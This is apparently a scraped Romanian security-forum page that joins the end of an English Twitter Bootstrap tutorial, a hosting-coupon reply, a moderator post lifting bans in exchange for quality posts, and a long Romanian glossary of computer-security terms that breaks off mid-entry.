to go. < div class="span4" >< /div > - a DIV with class span* is basically a column and in this case we want to have 3 boxes in one row so if we do simple math 12/3=4 and you get span4. < div class="hero-unit" >< /div > - this is just another component of Bootstrap we added to make this sample more cool. As you can see with only 3 CSS classes you already know the basics. The only thing you will be changing are .span classes and they can go from 1 to 12 depending on how wide you want your box/element to be. So a DIV with a “span12” class would be 1170px wide on large desktops, 940px wide on laptops, and smaller for tablets or phones. For a more complicated example check out the Bootstrap examples. With only this you can already create your responsive layout in a matter of minutes but it doesn’t stop there, if you dig into Bootstrap docs you’ll see there are UI components like: navbars, tabs, accordions, dropdowns, buttons and so much more. Be sure to check out the Bootstrap Components page for all the greatness. Another good thing about Bootstrap is that you can use a bunch of standardized and cool JS plugins like modals, tabs, accordions, sliders which work great with the default Bootstrap style but are also responsive and fully customizable. Extending Bootstrap Bootstrap by itself comes packed with most of the stuff a regular front-end developer would need, especially a beginner but for those more advanced guys or pros here are a few plugins or hacks that made my life easier: jQuery UI Bootstrap Theme This is something a lot of front-end developers use when building modern and interactive designer so a suitable jQuery UI theme is a must have. I have tested this myself and it really works well and accompanies the Bootstrap design as it should. Bootstrap Colorpicker Another great plugin for Bootstrap to handle color picking in an awesome way. Fbootstrapp Fbootstrapp is a toolkit designed to kickstart development of facebook iframe apps in both relevant sizes. It includes base CSS and HTML for typography, forms, buttons, tables, grids, navigation, and more, styled in the typical facebook look and feel. Forms inside Bootstrap Dropdowns This is more of a hack but it really comes handy if you wanna have login forms in those simple to use Bootstrap Dropdown menus. Font Awesome If you are more of an icon guy when building UI elements then this custom font that is made of icons is gonna make you smile. Over 70 icons made especially for bootstrap in one CSS file BootBox Bootbox.js is a small JavaScript library which allows you to create programmatic dialog boxes using Twitter's Bootstrap modals. Going crazy with Bootstrap So you're maybe thinking: “This is all cool but Bootstrap has a too generic design and i just don’t see it working with my super custom and awesome designs”. Stop right there and let me tell you that you are wrong. You can use Bootstrap with any design and in any case. I had clients approach me with existing code and CSS but no responsive layout and in a matter of a day or two I managed to turn their website into a responsive one. A great example is my company's portfolio over at flip.hr. When you visit the site most of you would never even think that this is built on Bootstrap because the design is so customized and different but yet again everything was done on top of Bootstrap. But indeed it is, and I’ll name a few of components we used: navbars, hero units, thumbnails, buttons, modals, base styles and so much more. We also knew we wanted to have a full screen experience on our website so we used Bootstrap’s fluid layout which saved us a lot of time so we could focus more on the design and UI itself. Another good thing about Bootstrap is that it’s very flexible and plays nice with almost everything. For an example on our website we included some more stuff like: layout centering, lazy loading of images, hardware acceleration for page transitions, custom modal loaders for Bootstrap, a lot of CSS3 transitions, transforms and effects. We also wrote some media queries of our own because we wanted things to look and feel the same on all devices but most of it still comes from the power of Bootstrap. This kind of a website would take us months to make and test on all devices and resolutions, this way we could focus more on the design, functionality and SEO stuff. Secrets of the PROs Adobe Edge Inspect Edge Inspect was just recently released and it enables you to preview and test designs on IOS and Android devices, oh and did I mention it all does that remotely This’ll save you a lot of time and help you produce better and faster responsive features. Viewport Resizer Another great new tool for testing your websites responsiveness. This is a browser based tool (bookmarklet to be exact) so no additional download or set up is required. just click and go. So basically there are a few approaches to responsive images that actually work. Most of the guys I know use Filament Group’s responsive images technique but adaptive images is also a good way just a bit of a different concept. So until the HTML5 spec gets some something better and native, read up on these three links: Responsive Images Adaptive Images Retina Images Misc So this is also something that might come in useful when working on responsive designs. The Fittext plugin is really cool but hopefully you won't have to use it often and the Responsive Slides plugin is the best one out there. Fittext Responsive Slides Bonus and More Resources HTML5 Boilerplate This is a great HTML5 template for all front-end developers. It’s basically a set of tips, hacks and best practices for front-end development. I use this in most of my projects, of course in time you will pick the parts you need but all in all a must have and a must read. Foundation framework This is something I managed to find out during the writing of this article. I have checked this out for a few minutes and it looks to be a possible alternative to Bootstrap. Foundation as they say is the most advanced responsive framework out there and it has a lot of the features that Bootstrap has with some added bonuses. Be sure to check this out also. Here are some other useful resources related to Twitter Bootstrap. Building Twitter Bootstrap Twitter Bootstrap 101: Introduction 20 Awesome Resources for Twitter Bootstrap Lovers 20+ Beautiful Resources That Complement Twitter Bootstrap Conclusion I hope I managed to introduce Bootstrap to you in a good way and that you would give it a try. Remember it will not make you a website if you don’t know anything but it will sure as hell help you a lot if you know something. Source: How to use Twitter Bootstrap to Create a Responsive Website Design

N-are nimic, ia-ti de pe 1and1, ai la ei si privacy moca 1 an, http://www.retailmenot.com/view/1and1.com?c=5188877 Ajunge undeva pe la 2-3$

Nu ne bagam peste deciziile moderatorilor/adminilor sa scoatem banuri fara un motiv bine intemeiat. Sa nu aveti obiectii de facut si sa nu se supere omul ce v-a dat ban, va propun altceva. Va scot banurile si aveti 5 zile timp sa puneti fiecare cate 10 stiri bune de securitate sau cate 5 tutoriale (photoshop, windows, linux, php, python ... sau orice altceva tehnic si de calitate) Ati calcat pe bec si ati luat ban. Cred ca si ceilalti mods/admins sunt de acord sa va scoatem banurile dar sa prestati ceva munca pentru comunitate Daca incalcati intelegerea, aveti ban permanent de la mine, si va adaug la usere un sufix cu "_Labar". Nu incercati sa ma furati la cantar. Usere: - askwrite - Cifre - Byte-ul Deal ?! Au fost de acord toti. In cateva minute o sa fie banurile scoase. Deci aveti timp 5 zile. ---------------------------- edit - 02.03.2014 Thread-uri facute de Byte-ul https://rstforums.com/forum/82145-boeing-launches-ultra-secure-black-smartphone-has-self-destruct-feature.rst https://rstforums.com/forum/82147-chameleon-virus-spreads-across-wifi-access-points-like-common-cold.rst https://rstforums.com/forum/82159-optic-nerve-nsa-hacked-into-webcam-millions-yahoo-users-private-images.rst https://rstforums.com/forum/82162-dissecting-newest-ie10-0-day-exploit-cve-2014-0322-a.rst https://rstforums.com/forum/82173-yahoo-vulnerability-allows-hacker-delete-1-5-million-records-database.rst https://rstforums.com/forum/82200-hackercare-aims-hack-healthcare-startups.rst https://rstforums.com/forum/82201-auroracoin-airdrop-approaches-iceland-adopts-cryptocurrency.rst https://rstforums.com/forum/82199-amex-debuts-its-most-mobile-integrated-rewards-focused-credit-card.rst Threaduri facute de Cifre https://rstforums.com/forum/82136-fortress-may-first-public-company-own-millions-dollars-bitcoins-disclose.rst https://rstforums.com/forum/82137-mt-gox-files-bankruptcy-claims-63-6m-debt.rst https://rstforums.com/forum/82144-how-use-twitter-bootstrap-create-responsive-website-design.rst https://rstforums.com/forum/82151-how-create-windows-store-app-using-html-javascript.rst https://rstforums.com/forum/82187-creating-new-google-play-multi-level-navigation-scratch.rst https://rstforums.com/forum/82188-how-encrypt-custom-configuration-section-asp-net.rst Threaduri facute de askwrite https://rstforums.com/forum/82134-photoshop-cum-sa-faci-un-logo-sigla.rst https://rstforums.com/forum/82138-photoshop-dispersion-effect-smoke-cs7.rst https://rstforums.com/forum/82139-photoshop-cum-sa-faci-un-banner-web-animat.rst https://rstforums.com/forum/82140-photoshop-soft-focus-effect.rst https://rstforums.com/forum/82142-photoshop-glowing-line-effect.rst askwrite pare ca ne-a cam furat la cantar cu deal-ul. Cifre si Byte-ul chiar au postat baietii. // edit: Puteti continua baieti. Daca mai faceti si voi ocazional cate un post de calitate oamenii vor tine cont de ele. Asta e ideea unei comunitati.

Securitatea calculatoarelor (computer security sau IT security) - cunoscuta si sub numele de securitate cibernetica sau securitate IT, este securitatea informatiilor, aplicata calculatoarelor si retelelor de calculatoare. Domeniul include toate procesele si mecanismele prin care echipamentele bazate pe un calculator, informatiile si serviciile acestuia sunt protejate de accesul neinten?ionat sau neautorizat, de modificari nedorite sau distrugere. Securitatea calculatoarelor include si protectia sistemelor IT la evenimente neprevazute (ex. incendii) si dezastre naturale (ex. inundatii). Bit – o extensie a termenului cifra binara. Cea mai mica unitate de informatie intr-un sistem de notatie binar. O cifra binara avand valoarea de 0 sau 1. Aplicatie (Application) – un program software gazduit de un sistem informatic. Certificare identitate (Authenticate) – operatiune folosita pentru confirmarea identitatii unei entitati, atunci cand aceasta identitate doreste acces. Autentificare (Authentication) – folosita in cazul verificarii identitatii unui utilizator, dispozitiv utilizator, sau alta entitate. Procesul de stabilire a increderii de autenticitate. Cuprinde verificarea identitatii, autentificarea originii mesajului ?i autentificarea continutul mesajului. Un proces care stabile?te originea informa?iilor sau determin? identitatea unei entit??i. Procesul de verificare a identitatii sau a altor atribute solicitate de catre sau asumate de o entitate (utilizator, proces, sau dispozitiv), sau pentru a verifica sursa si integritatea datelor. Procesul de stabilire a încrederii în identitatea utilizatorilor sau sistemelor informatice. Acces – posibilitatea de a utiliza orice resursa a unui sistem informational (SI). Capacitatea si mijloacele de comunicare cu sau de a putea interac?iona cu un sistem, de a utiliza resursele sistemului pentru a putea opera cu informatiile, de a dobandi cunostinte despre informatiile pe care sistemul le contine sau pentru a controla componentele si functiile sistemului. Controlul accesului – procesul de acordare sau refuzare a unei cereri specifice cum ar fi obtinerea si utilizarea de informatii si servicii de prelucrare a informatiilor conexe. Tip de acces – privilegiul detinut pentru a putea intreprinde o actiune asupra unui obiect sau entitati. Exemple de tip de acces: citire, scriere, executie, adaugare, modificare, stergere si creare. Cod de autentificare – Authentication Code Un control criptografic bazat pe o functie de securitate testata anterior (de asemenea, cunoscut ca Message Authentication Code [MAC]). Cont administrativ – cont de utilizator cu privilegii (drepturi) depline intr-un calculator. (Ex. contul utilizatorului root in SO Linux si Unix, Administrator in SO Windows. Cunoscut si sub numele de superuser). Continut activ – se poate referi la: # documente electronice ce transporta date sau declanseaza actiuni in mod automat pe platforma unui calculator, fara interventia unui utilizator. # programe informatice sub diferite forme, capabile sa actioneze vehicularea de date sau sa declanseze actiuni in mod automat pe platforma unui calculator, fara interventia unui utilizator. Amenintari persistente avansate – Advanced Persistent Threats (APT) Este vorba despre un inamic ce are un nivel sofisticat de expertiza si resurse semnificative, ce îi permit sa creeze oportunitati pentru atingerea obiectivelor sale prin utilizarea mai multor vectori de atac (de exemplu, informatica, fizica si de fraudare sau inducere in eroare). Aceste obiective includ de obicei, stabilirea si extinderea sprijinului in infrastructura IT a organizatiilor vizate in scopul extragerii si filtrarii informatiilor, subminare sau impiedicare a aspectelor critice ale unei actiuni, program sau organizatie, actionand efectiv pentru a indeplini aceste obiective pe viitor. Amenintarea persistenta avansata: (i) urmareste obiectivele in mod repetat, pe o perioada extinsa de timp, (ii) se adapteaza la eforturile aparatorilor pentru a rezista, si (iii) este determinata de a mentine nivelul de interactiune necesare executarii obiectivelor sale. Anti-imitatie – Anti-spoof Contramasuri luate pentru a preveni utilizarea neautorizata a datelor de identificare si autentificare (I&A) legitime, deja obtinute, cu scopul de a imita un subiect, altul decat atacatorul. Alerta – notificarea faptului ca exista un atac in desfasurare sau a existat un atac indreptat catre sistemele informatice ale unei organizatii. Atac – incercare de a obtine acces neautorizat la serviciile unui sistem, resurse sau informatiile acestuia ori o incercare de a compromite integritatea sistemului. Orice fel de activitate rau intentionata, ce incearca sa colecteze, sa perturbe, sa interzica, sa degradeze sau sa distruga resurse ale unui sistem de informatii sau chiar a informatiilor in sine. Semnatura atacului – Attack Signature O secventa specifica de evenimente ce indica o incercare de acces neautorizat. Un model byte caracteristic utilizat în cod malitios ori un indicator sau un set de indicatori, ce permite identificarea activitatilor cu scop rau intentionat intr-o de retea. Atac activ – un atac ce altereaza un sistem sau date. Atac mixat (Blended attack) – actiune ostila intreprinsa pentru a raspandi cod daunator prin intermediul mai multor metode. Atacul parolei prin forta bruta (Brute Force Password Attack) – metoda de accesare a unui dispozitiv blocat, prin incercarea mai multor combinatii de parole numerice si/sau alfanumerice. Buffer Overflow (Supraincarcarea memoriei tampon) – stare a unei interfete in care mai multe intrari pot fi plasate intr-un buffer de date sau zona de pastrare a datelor, suprascriind informatiile anterior detinute. Atacatorii exploateaza o astfel de stare pentru a prabusi sistemul sau de a insera cod special conceput, care le permit sa preia controlul asupra sistemului. Atacul prin supraincarcarea memoriei tampon (Buffer Overflow Attack) – metoda de supraincarcare a cantitatii de spatiu predefinite dintr-un tampon, ce poate suprascrie eventual corupe date in memorie. Autoritate de acces – entitate ce raspunde de monitorizarea si acordarea de privilegii de acces pentru alte entitati autorizate. Aviz consultativ – Advisory Notificarea noilor tendinte semnificative sau a evolutiilor cu privire la amenintarea sistemelor informatice ale unei organizatii. Aceasta notificare poate include perspective analitice in tendinte, intentii, tehnologii sau tactici ale unui adversar care vizeaza sistemele informatice. Audit Analiza independenta si examinarea inregistrarilor si activitatilor pentru a evalua caracterul adecvat al controalelor sistemului, pentru a asigura conformitatea cu politicile stabilite si procedurile operationale si de a recomanda schimbarile necesare in controale, politici sau proceduri. Testarea activa a securitatii Modalitate de testarea a securitatii ce implica interactiunea directa cu o tinta, cum ar fi trimiterea de pachete de date catre aceasta. Analiza – examinarea datelor achizitionate, valoroase prin semnificatia si valoarea probatorie a incidentului. Instrumente de accelerare a auditului – Audit Reduction Tools Preprocesoare concepute pentru a reduce volumul de înregistr?ri de audit pentru a facilita revizuirea manual. Înainte de o revizuire a securit??ii, aceste instrumente pot elimina mai multe înregistr?ri de audit cunoscute a avea o semnifica?ie mica din punct de vedere al conceptului de securitate. Aceste instrumente elimina, in general, inregistr?rile generate de clase specificate de evenimente, cum ar fi inregistrarile generate de backup-urile de noapte. Date de audit – Audit data Inregistrarea cronologica a activitatilor unui sistem, ce permite reconstructia si examinarea succesiunii evenimentelor precum si a modificarilor intr-un eveniment. Jurnal de audit (Audit log) O inregistrare cronologica a activitatilor sistemului. Include inregistrari ale accesarilor sistemului si operatiunile efectuate intr-o anumita perioada de timp. Examinarea auditului (Audit review) Aprecierea unui sistem informatic cu scopul de a evalua caracterul adecvat al controalelor de securitate implementate, pentru a ne asigura ca acestea functioneaza in mod corespunzator, identificarea vulnerabilitatilor ?i asistarea la implementarea de noi controale de securitate in cazul in care este necesar. Aceasta apreciere se efectueaza anual sau ori de cate ori a avut loc o schimbare semnificativa si poate duce la recertificarea sistemului informatic. Pista de audit (Audit trail) O inregistrare sau o colectie de inregistrari (date) ce arata cine a accesat un sistem IT si ce operatiuni a efectuat utilizatorul intr-o perioada data. O inregistrare cronologica care reconstruieste si examineaza secventa de activitati privitoare la sau care conduc la o operatiune specifica, procedura sau eveniment, intr-o tranzactie relevanta din punct de vedere al securitatii, de la inceput pana la rezultatul final. Detectia pe baza anomaliilor - Anomaly-Based Detection Procesul de comparare prin definitie a activitatii considerata normala comparativ cu evenimentele observate pentru a identifica abateri semnificative. Detectia atacului si avertizare - Attack Sensing and Warning (AS&W) Detectarea, corelarea, identificarea si caracterul de activitate neautorizata intentionata cu notificare la factorii de decizie, astfel ca poate sa se raspunda atacului in mod adecvat. Lista de acces al controlului Acces Control List (ACL) 1. O lista de permisiuni asociate cu un obiect. Lista specifica cine sau ce este permis pentru a accesa obiectul si ce operatiuni li se permite sa fie efectuate pe obiect. 2. Un mecanism care pune in aplicare controlul accesului pentru o resursa sistem prin enumerarea entitatilor sistemului ce au permisiunea de a accesa resurse si care sa ateste, fie implicit, fie explicit, modurile de acces acordate pentru fiecare entitate. Liste de control acces (ACLs) Un registru de: 1. utilizatori (inclusiv grupuri, calculatoare, procese) carora le-a fost data permisiunea de a utiliza o anumita resursa de sistem si 2. tipuri de acces care le-a fost permis. Mecanism de control al accesului Garantii de securitate (de exemplu, hardware ?i software caracteristice, controale fizice, proceduri de operare, proceduri de gestionare, precum si diverse combina?ii ale acestora) concepute pentru a detecta si de a refuza accesul neautorizat si permiterea unui acces autorizat la un sistem informatic. Profil de acces - Access profile Asocierea unui utilizator intr-o lista de obiecte protejate si la care utilizatorul poate avea acces. Managementul contului de utilizator (User Account Management) Implica: 1) procesul de solicitare, stabilire, creare si inchidere a contului de utilizator; 2) supravegherea utilizatorilor si a autorizatiilor de acces respective; 3) gestionarea acestor functii. Securitate suplimentara (Add-on security) Incorporarea de noi componente hardware, software sau de masuri de protectie pentru software intr-un sistem de informatii operational. Securitate adecvata Securitatea proportionala cu riscul si importanta pagubei ce ar rezulta prin pierderea, utilizarea abuziva sau accesul neautorizat la informatii sau chiar sau modificarea lor. Acest fapt include faptul ca sistemele informatice functioneaza in mod eficient si ofera o confidentialitate corespunzatoare, integritate si disponibilitate prin utilizarea managementului eficient din punct de vedere al costurilor, personalului, functionarii si controalelor tehnice. Common Misuse Scoring System (CMSS) (Sistemul de punctaj al abuzului comun) [CMSS] - o grila de cuantificare a severitatii vulnerabilitatilor facilitate de abuzul unui software. O vulnerabilitate a unui software in caz de abuz este o capacitate functionala data de catre software. O vulnerabilitate facilitata de abuzul unui software este o vulnerabilitate in care caracteristica prevede de asemenea, o cale de a compromite securitatea unui sistem. Garantii administrative Actiuni administrative, politici si proceduri pentru gestionarea selectiei, dezvoltarea, implementarea si mentinerea masurilor de securitate pentru a proteja integritatea informatiilor electronice si gestionarea comportamentului uman al entitatii reglementate, in raport cu protejarea acestor informatii. Standard avansat de criptare - Advanced Encryption Standard (AES) Advanced Encryption Standard indica un algoritm criptografic ce poate fi folosit pentru a proteja date electronice. Algoritmul AES este un cifru cu bloc simetric, care poate cripta (codifica) si decripta (descifra) informatii. Acest standard foloseste conform algoritmului Rijndael, un cifru bloc simetric, care poate procesa blocuri de date de 128 de biti, folosind chei de cifrare cu lungimi de 128, 192 si 256 biti. Procesor de cheie avansat - Advanced Key Processor (AKP) Un dispozitiv criptografic care indeplineste toate functiile criptografice pentru managementul unui nod client ?i con?ine interfe?ele pentru 1) schimbul de informa?ii cu o platforma de client, 2) interactiune cu dispozitivele complementare, si 3) conectarea unei platforme client în siguranta la nodul serviciilor primare (PRimary Services Node). Chei asimetrice Doua chei conexe, una publica si cealalta privata, utilizate pentru a efectua operatiuni complementare, cum ar fi criptarea si decriptarea sau crearea semnaturii si verificarea semnaturii. Alocare Procesul de organizare in care se determina masurile de securitate definite, acestea putand fi specifice, hibride sau obisnuite. Procesul de organizare pentru a atribui controale de securitate la componentele specifice sistemului informatic, responsabil pentru asigurarea unei anumite capacitati de securitate (de exemplu, router, server, senzori controlati de la distanta). Software antispyware Program informatic specializat in detectia de malware si forme non-malware ale spyware-ului. Software antivirus Un program care monitorizeaza un calculator sau o retea pentru a identifica toate tipurile principale de malware si preveni aparitia continutului de tip malware sau a incidentelor de acest gen. Asigurare Temeiurile de incredere ca celelalte patru obiective ale securitatii (integritate, disponibilitate, confidentialitate, precum si responsabilitate), au fost indeplinite in mod adecvat de catre o implementare specifica. Expresia de "indeplinite adecvat" include (1) o functionalitate corecta, (2) o protectie suficienta impotriva erorilor neintentionate (a utilizatorilor sau a software-ului) si (3) o rezistenta suficienta la penetrare intentionata sau la ocolire. Se mai refera si la increderea ca setul de controale destinate securitatii intr-un sistem de informatic sunt eficiente in aplicarea lor. Masura increderii ca practicile, caracteristicile de securitate, procedurile, precum si arhitectura unui sistem de informare intermediaza corect si aplica politica de securitate. Software asigurat Aplicatie de calculator care a fost proiectata, dezvoltata, analizata si testata folosind procese, instrumente si tehnici care stabilesc un nivel de incredere in aceasta. Mecanism de autentificare - Authentication mechanism Mecanism pe baza de componenta hardware sau software, ce obliga utilizatorii sa dovedeasca identitatea lor inainte de a accesa datele de pe un dispozitiv. Mod de autentificare Un mod de cifrare in bloc de func?ionare, care poate oferi o asigurare a autenticitatii si prin urmare, integritatea datelor. Perioada de autentificare - Authentication period Perioada maxima acceptabila intre orice proces de autentificare initial? si procesele de reautentificare ulterioare in timpul unei singure sesiuni terminal sau in cursul perioadei in care datele sunt accesate. Protocol de autentificare - Authentication protocol O secventa definita de mesaje, intre un solicitant si un verificator, care demonstreaza ca solicitantul are posesia si controlul unui token valid pentru a stabili identitatea ei/lui, si optional, demonstreaza solicitantului ca el/ea comunica cu verificatorul cu care trebuia. Este un proces bine specificat, schimbul de mesaje intre solicitant si verificator permitand verificatorului sa confirme identitatea solicitantului. Eticheta de autentificare - Authentication Tag O pereche de siruri de biti asociata unor date pentru a oferi o asigurare a autenticitatii sale. Token de autentificare - autentificare oricarei informatii transmisa in timpul unui schimb de date de autentificare. Autentificator - Mijloacele utilizate pentru a confirma identitatea unui utilizator, proces sau dispozitiv (de exemplu parola de utilizator sau token). Autenticitate - Proprietatea de a fi autentic, ce poate fi verificat si de incredere, incredere in validitatea unei transmisii, a unui mesaj sau a unui mesaj initiator. Autorizare - privilegii de acces acordate unui utilizator, program, proces sau actul de acordare a acestor privilegii. Cheie de transport automat - transportul de chei criptografice, de obicei, in forma criptata, utilizand mijloace electronice, cum ar fi o re?ea de calculatoare (de exemplu, protocoale-cheie de transport / acord). Backup - O copie a fisierelor si programe realizata pentru a facilita recuperarea, atunci cand este necesar. Generator automat de parola - un algoritm ce creeaza parole aleatorii si care nu au nici o legatura cu un utilizator anume. Sistem autonom (AS) - unul sau mai multe routere sub o singura administrare a operarii, cu aceeasi politica de rutare. Disponibilitate (Availability) - Asigurarea accesului in timp util si fiabil la informatii si la utilizarea lor. Proprietatea de a fi accesibil si utilizabil la cerere de catre o entitate autorizata. Constientizare (Awarness) - Activita?i care incearca sa capteze atentia unei persoane pe o problema de securitate sau pe un set de probleme de acest gen. Back door - in mod obisnuit software-ul neautorizat sau mecanism hardware utilizat ascuns pentru a eluda controalele de securitate. Backdoor - o modalitate nedocumentata de a avea acces la un sistem informatic. Un backdoor este un risc potential de securitate. Basic Testing – o metodologie de testare care nu cunoaste structura interna si detaliile implementarii despre subiectului evaluarii. De asemenea, cunoscut sub numele de testare tip "cutie neagra" (black box testing). Baseline – hardware, software, baze de date, precum si documentatia relevanta pentru un sistem informatic la un moment dat, in timp. Efect comportamental (Behavioral outcome) – este ceea ce se asteapta de la o persoana sa manifeste in urma absolvirii cursului de pregatire in securitate IT, pentru a putea fi performant la locul de munca. Mediu benign – O locatie neostila protejata de elemente externe ostile, fizic, prin personal si prin contramasuri procedurale de securitate. Se refera la locatia unde sunt depozitate fizic sistemele de calcul. Binding – Procesul de asociere intre doua elemente legate, elementul comun fiind informatia. Procesul de asociere a unui terminal de comunicatii specific cu o cheie criptografica specifica. Poate fi si o confirmare a unei terte parti de incredere, ce asociaza identitatea unei entitati cu cheia sa publica. Amprenta biometrica – o caracteristica fizica sau comportamentala a unei fiinte umane. O trasatura caracteristica determinabila fizic sau o trasatura personala de comportament, utilizate pentru a recunoaste identitatea sau pentru a verifica identitatea declinata a unui solicitant. Imaginile faciale, amprentele digitale, scanarea irisului sau recunoasterea scrisului de mana al unei anumite persoane sunt toate exemple de biometrie. Un anumit set de gesturi cu mana sau cu mainile in fata unei camere video de acces conectata la un sistem automat de access, pot fi un cod de acces. Informatii biometrice - informatii electronice stocate referitoare la o trasatura biometrica. Aceste informatii pot fi sub forma de pixeli bruti sau comprimati sau sub forma unor anumite caracteristici (ex. modele). Sistem biometric – un sistem automatizat capabil sa: 1) captureze o mostra biometrica de la un utilizator final; 2) extraga date biometrice din acea mostra; 3) compare datele biometrice extrase cu datele continute in una sau mai referinte; 4) decida cat de mult se aseamana intre ele si 5) indice pozitiv sau negativ daca identificarea sau verificarea unei identitati s-a facut cu succes. Black core – o arhitectura de retea de comunicatii in care datele utilizatorului, strabat o retea globala IP, iar la capete este criptata pe nivelul de protocol IP. Blinding – generarea de trafic de retea, care este de natura sa declanseze mai multe alerte intr-o perioada scurta de timp, pentru a masca alertele declan?ate de un atac "real", opratiuni efectuate simultan. Lista neagra (Black list) – o lista de expeditori de e-mail care au trimis anterior spam unui utilizator. O lista de entitati distincte, cum ar fi host-uri sau aplicatii, ce sunt considerate a fi avand anterior activitati daunatoare. Blacklisting (adaugarea in lista neagra) – procedeul unui sistem de invalidare a unui ID de utilizator bazat pe actiunile anterioare inadecvate ale utilizatorului. Un ID de utilizator adaugat in lista neagra nu poate fi utilizat pentru conectarea la un sistem chiar si cu autentificatorul corect. Trecerea in lista neagra si stergerea dintr-o lista neagra sunt doua evenimente de mare relevanta in securitatea calculatoarelor. Mentionarea in aceasta lista neagra, se aplica si blocurilor de clase de adrese IP pentru a preveni utilizarea necorespunzatoare sau neautorizata a resurselor de pe Internet. Echipa Albastra 1. Grupul responsabil de protectia utilizarii sistemelor informatice ale unei institutii prin asigurarea securitatii acestora impotriva unui grup de atacatori imaginari sau chiar reali (exemplu Echipa Rosie). De obicei, Echipa Albastra si membrii sai trebuie sa apere sistemele impotriva atacurilor reale sau simulate 1) pe o perioada semnificativa de timp, 2) intr-un context operational reprezentativ (exemplu: ca parte a unui exercitiu operational), si 3) in conformitate cu normele stabilite si monitorizare de catre un grup neutru prin arbitrarea simularii sau exercitiului (exemplu: Echipa Alba). 2. Termenul de Echipa Albastra este de asemenea folosit pentru a defini un grup de indivizi ce desfasoara evaluari ale vulnerabilitatilor unei retele operationale si sa ofere tehnici de diminuare a consecintelor (mitigation) pentru clientii care au nevoie de o analiza tehnica independenta a pozitionarii retelei lor vis-a-vis de conceptul de securitate. Echipa Albastra identifica amenintarile si riscurile de securitate in mediul de utilizare, si in colaborare cu clientul, analizeaza reteaua si starea sa actuala de securitate. In baza concluziilor si expertizei Echipei Albastre, se ofera recomandari ce se vor integra intr-o solutie de securitate globala comuna pentru a creste starea de securitate cibernetica a sistemelor clientului. De foarte multe ori se angajeaza o Echipa Albastra inainte de a angaja Echipa Rosie, pentru a se asigura ca retelele clientului sunt cat mai sigure posibil, inainte ca Echipa Rosie sa testeze sistemele. Limita perimetrala (Boundary) – perimetrul fizic sau logic al unui sistem. Protectia perimetrala (Boundary Protection) – monitorizarea si controlul comunicatiilor la limita exterioara a unui sistem informatic pentru prevenirea si detectarea actiunilor daunatoare, comunicari neautorizate, prin utilizarea de dispozitive de protectie a delimitarii (ex. proxy, gateway, router, firewall, guards, encrypted tunnels). Dispozitiv de protectie perimetrala – un dispozitiv cu mecanisme adecvate care: (I) faciliteaza alegerea diferitelor politici de securitate a sistemelor interconectate (ex. controleaza fluxul de informatii in sau dintr-un sistem interconectat) si/sau (II) ofera sistemului informatic protectie perimetrala. Un dispozitiv cu mecanisme adecvate ce faciliteaz? alegerea de diferite politici de securitate pentru sisteme interconectate. Navigare (browsing) – operatiunea de cautare intr-un sistem de informatic de stocare sau de continut activ pentru a localiza sau de a procura informatii, fara sa cunoasca in mod neaparat existenta sau formatul informatiilor cautate. Bulk encryption – encriptarea tuturor canalelor unei legaturi multicanal de telecomunicatii. Firewall – software-ul sau sistemul hardware de securitate a retelei ce inspecteaza traficul de retea la intrare si la iesire prin analiza pachetelor de date si stabileste daca acestora ar trebui sa li se permita sau nu tranzitul, in baza unui set de reguli prestabilite. Un firewall stabileste o bariera filtranta intre o retea interna sigura de incredere si o alta retea (de ex. Internet), care se presupune a nu fi sigura si de incredere. Multe routere contin componente firewall si invers, multe firewall-uri pot indeplini functiile de baza ale rutarii. Challenge and Reply Authentication – procedura prestabilita in care un subiect face o cerere de autentificare altui subiect si isi dovedeste validitatea cererii printr-un raspuns corect. Challenge-Response Protocol – un protocol de autentificare in care verificatorul trimite solicitantului o somatie (in mod obisnuit o valoare aleatoare) pe care solicitantul o combina cu un secret folsoit in autentificare (adesea prin hashing-ul somatiei si a secretului partajat de cele doua entitati sau prin efectuarea unei operatiuni speciale asupra cheii private a somatiei) pentru a genera un raspuns care este trimis verificatorului. Verificatorul poate reverifica in mod independent raspunsul generat de solicitant (cum ar fi recalcularea hash-ului somatiei si a secretului partajat si compararea raspunsului sau executarea unei operatii asupra cheii publice pe raspuns) si stabili faptul ca solicitantul detine si controleaza secretul. Check Word (cuvant de control) – text cifrat generat de o functie criptografica pentru a detecta scaparile (lacunele) in criptografie. Checksum (suma de control) – valoare calculata pe o colectie de date, in vederea detectiei erorilor sau a existentei manipularii in vederea alterarii sau falsificarii. Cifru – serii de transformari ce convertesc textul clar in text codificat(cifrat) folosind o cheie de cifru. In orice sistem criptografic simbolurile arbitrare sau grupurile de simboluri reprezinta unitati de text clar, unitati de text clar rearanjate sau ambele. Ciphony (cifonie) – procesul de cifrare a unei informatii audio, rezultind o secventa audio criptata (cifrata). Closed security environment – mediu ce ofera asigurari suficiente ca aplicatiile si echipamentele sunt protejate impotriva patrunderii a orice ar fi daunator ciclului de viata al sistemului informatic. Securitatea de tip proximal se bazeaza pe un sistem compus din dezvoltatori, operatori si personal de intretinere, ce sunt suficient de verificati, detin autorizarea necesara si controlul configuratiei. Cifru (cod) – sistem de comunicare in care grupuri arbitrare de litere, numere sau simboluri reprezinta unitati de text clar de lungime variabila. Cloud computing – un model de permisiune la cerere a accesului la o concentrare de capabilitati/resurse IT configurabile (ex. retele, server-e, capacitati de stocare, aplicatii si servicii) ce pot fi rapid suplimentate si eliberate cu un efort de management minimal sau cu o interactiune minima din parte furnizorului unor asemenea servicii. Utilizatorilor le este permis accesul la serviciile de natura tehnica din reteaua "cloud" fara a cunoaste, a avea priceperea sau controlul asupra infrastructurii tehnologice ce sta la baza. Acest model de aglomerare are cinci caracteristici esentiale (auto-service la cerere, acces omniprezent la retea, locatie independenta a concentrarii de resurse, elasticitate rapida si cuantificarea serviciului); trei modele de furnizare a serviciului (Cloud Software as a Service [saaS], Cloud Platform as a Service [PaaS] si Cloud Infrastructure as a Service [iaaS]); si patru modele de acces de tip "enterprise" (Private cloud, Community cloud, Public cloud si Hybrid cloud). Observatie: Datele utilizatorului si serviciile esentiale de securitate se afla in/ si pot fi managerizate din/ interiorul retelei "cloud". Common Vulnerabilities and Exposures (CVE) (Cele mai raspandite vulnerabilitati si dezvaluiri) – un dictionar al denumirilor comune pentru informatiile facute publice despre vulnerabilitatile unui sistem de informatic. Common Vulnerability Scoring System (CVSS) – specificatie a Security Content Automation Protocol pentru comunicarea caracteristicilor vulnerabilitatilor si cuantificarea lor referitor la severitate. Communications cover (Comunicatii deghizate) – deghizarea sau modificarea caracteristicilor modelelor obisnuite de comunicatii pentru a ascunde transmiterea de informatii ce ar putea avea valoare pentru un potential inamic. Communications deception (Comunicatii false) – transmitere intentionata, retransmisie sau modificarea modului de comunicare cu scopul de a 